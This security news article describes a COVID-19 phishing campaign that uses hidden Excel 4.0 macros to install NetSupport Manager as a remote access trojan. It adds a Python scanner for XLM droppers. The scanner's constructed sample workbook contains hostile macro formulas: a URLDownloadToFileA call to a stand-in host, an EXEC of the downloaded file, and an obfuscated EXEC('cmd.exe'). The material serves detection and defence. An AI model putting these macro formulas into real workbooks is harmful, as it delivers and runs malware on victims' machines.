A Complex Phishing Attack Exploits Microsoft Excel 4.0 Macros

The Microsoft Security Intelligence team has announced that a massive phishing campaign is under way, exploiting concerns related to COVID-19. It is no surprise that scammers exploit a notorious event for their own gain, as has happened with other notable events in the past.

Early reports indicate that the campaign started almost two weeks ago. Attackers send an email with an eye-catching COVID-19 subject line and urge the recipient to download and open a malicious attachment.

Attack vectors

In most of the reported cases, the subject line of the email was WHO COVID-19 SITUATION REPORT. Several attachments are present within the email, purportedly containing important data on the spread of the coronavirus pandemic across the world.

Curious recipients who are interested in the content of the attachment will download and open it, doing exactly what the attackers hoped. The attachment is an Excel workbook; once it is opened and the recipient clicks through the warning to enable content (Excel 4.0 macros, like VBA macros, do not run while macros are disabled), it executes a series of hidden Excel 4.0 (XLM) macros.

These macros fetch, install, and run the NetSupport Manager remote access tool. While NetSupport Manager is a legitimate commercial remote-administration product (it is made by NetSupport, not Microsoft), attackers repurpose it as a remote access trojan: because the binaries are signed and widely deployed in legitimate environments, they are less likely to be flagged than custom malware.
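As an added example, not from the original article and not Microsoft's or NetSupport's code, here is a small Python scanner that flags the kind of Excel 4.0 macro sheet described above. It works on cell formulas that have already been extracted from a workbook (pulling them out of a real .xls/.xlsm file with a tool such as oletools is out of scope here), and it looks for the usual dropper layout: an Auto_Open entry point, a hidden or very-hidden macro sheet, CALL/EXEC and Win32 API references, download URLs, and CHAR()-chain obfuscation, which it decodes before scanning. The sample workbook, its cell formulas, the example.invalid URL and the file paths are all constructed for illustration; they are not indicators from the campaign.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Excel 4.0 (XLM) functions grouped by what they give the macro author.
HIGH_RISK = {"EXEC", "CALL", "REGISTER", "RUN"}                                 # process launch / arbitrary Win32 calls
MEDIUM_RISK = {"FOPEN", "FWRITE", "FORMULA", "FORMULA.FILL", "FORMULA.ARRAY"}   # file writes, macro cells written at runtime
EVASION = {"GET.WORKSPACE", "GET.WINDOW", "GET.DOCUMENT"}                       # environment probes used to dodge sandboxes

FUNC_RE = re.compile(r"(?<![A-Z0-9.])([A-Z][A-Z0-9.]*)\s*\(")                   # function names in an upper-cased formula
CHAR_CHAIN_RE = re.compile(r"CHAR\(\s*\d+\s*\)(?:\s*&\s*CHAR\(\s*\d+\s*\))*")   # CHAR(n)&CHAR(m)&... obfuscation
API_RE = re.compile(r"URLDownloadToFile|ShellExecute|WinExec|CreateProcess|VirtualAlloc", re.I)
URL_RE = re.compile(r"https?://[^\s\"')]+")


@dataclass
class MacroCell:
    sheet: str
    cell: str
    formula: str


@dataclass
class Workbook:
    sheets: dict[str, str]          # sheet name -> "visible" | "hidden" | "veryHidden"
    defined_names: dict[str, str]   # defined name -> reference, e.g. "Auto_Open": "Macro1!$A$1"
    cells: list[MacroCell] = field(default_factory=list)


@dataclass
class Finding:
    severity: str   # "high" | "medium" | "low"
    sheet: str
    cell: str       # "" for workbook-level findings
    detail: str


def decode_char_chains(formula: str) -> str:
    """Replace CHAR(n)&CHAR(m)&... runs with the text they build, so calls assembled at runtime become visible."""
    return CHAR_CHAIN_RE.sub(lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))), formula)


def scan_workbook(wb: Workbook) -> list[Finding]:
    findings: list[Finding] = []
    # Workbook level: an auto-run entry point plus a hidden macro sheet is the classic XLM dropper layout.
    for name, ref in wb.defined_names.items():
        if name.lower().startswith(("auto_open", "auto_close")):
            findings.append(Finding("medium", ref.split("!")[0], "", f"auto-run name {name} -> {ref}"))
    for sheet, state in wb.sheets.items():
        if state in ("hidden", "veryHidden"):
            findings.append(Finding("medium", sheet, "", f"sheet is {state}"))
    # Cell level: look at what each formula does once the obfuscation is stripped.
    for c in wb.cells:
        decoded = decode_char_chains(c.formula)
        if decoded != c.formula:
            findings.append(Finding("medium", c.sheet, c.cell, f"CHAR() chain decodes to: {decoded}"))
        funcs = set(FUNC_RE.findall(decoded.upper()))
        for f in sorted(funcs & HIGH_RISK):
            findings.append(Finding("high", c.sheet, c.cell, f"{f}() launches code or calls a DLL export"))
        for f in sorted(funcs & MEDIUM_RISK):
            findings.append(Finding("medium", c.sheet, c.cell, f"{f}() writes files or new macro cells"))
        for f in sorted(funcs & EVASION):
            findings.append(Finding("low", c.sheet, c.cell, f"{f}() environment probe (possible sandbox evasion)"))
        for api in API_RE.findall(decoded):
            findings.append(Finding("high", c.sheet, c.cell, f"Win32 API reference: {api}"))
        for url in URL_RE.findall(decoded):
            findings.append(Finding("high", c.sheet, c.cell, f"download URL: {url}"))
    return findings


def risk_score(findings: list[Finding]) -> int:
    """Crude additive score; any high-severity hit deserves a human look regardless of the total."""
    return sum({"high": 10, "medium": 3, "low": 1}[f.severity] for f in findings)


# Constructed sample (not a real campaign artifact), modelled on the chain described above: probe, download, execute.
SAMPLE = Workbook(
    sheets={"Sheet1": "visible", "Macro1": "veryHidden"},
    defined_names={"Auto_Open": "Macro1!$A$1"},
    cells=[
        MacroCell("Macro1", "A1", "=IF(GET.WORKSPACE(19),,CLOSE(TRUE))"),   # bail out if no mouse is present
        MacroCell("Macro1", "A2", r'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                                  r'"http://example.invalid/covid/report.exe","C:\Users\Public\report.exe",0,0)'),
        MacroCell("Macro1", "A3", r'=EXEC("C:\Users\Public\report.exe")'),
        MacroCell("Macro1", "A4", '=FORMULA(CHAR(61)&CHAR(69)&CHAR(88)&CHAR(69)&CHAR(67)&CHAR(40)'
                                  '&CHAR(34)&"cmd.exe"&CHAR(34)&CHAR(41),A6)'),  # writes =EXEC("cmd.exe") into A6
        MacroCell("Macro1", "A5", "=HALT()"),
        MacroCell("Sheet1", "B2", "=SUM(B3:B10)"),                          # benign formula, should stay quiet
    ],
)

if __name__ == "__main__":
    hits = scan_workbook(SAMPLE)
    for h in hits:
        print(f"[{h.severity:6}] {h.sheet}!{h.cell or '-'}: {h.detail}")
    print("risk score:", risk_score(hits))
```

The static view is only half the picture: the same chain is visible at runtime as EXCEL.EXE spawning a child process and a freshly written executable making its first outbound connection, so a process-lineage rule in EDR telemetry is the natural complement to a scanner like this one.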

Acting in the background

Once the NetSupport tool is up and running, it attempts to connect to a pre-defined command-and-control (C2) server. From there the attacker can push further commands to the infected machine and run additional executables and scripts to monitor the victim and harvest sensitive data.

As always, the best way to avoid trouble is to mark suspect emails as spam and delete them as quickly as possible, and never to click "Enable Content" on a document that arrived unsolicited. Organizations such as the WHO publish their situation reports openly on their own websites rather than sending them out as email attachments, so a "report" that arrives this way should be reported to your security team instead of opened.


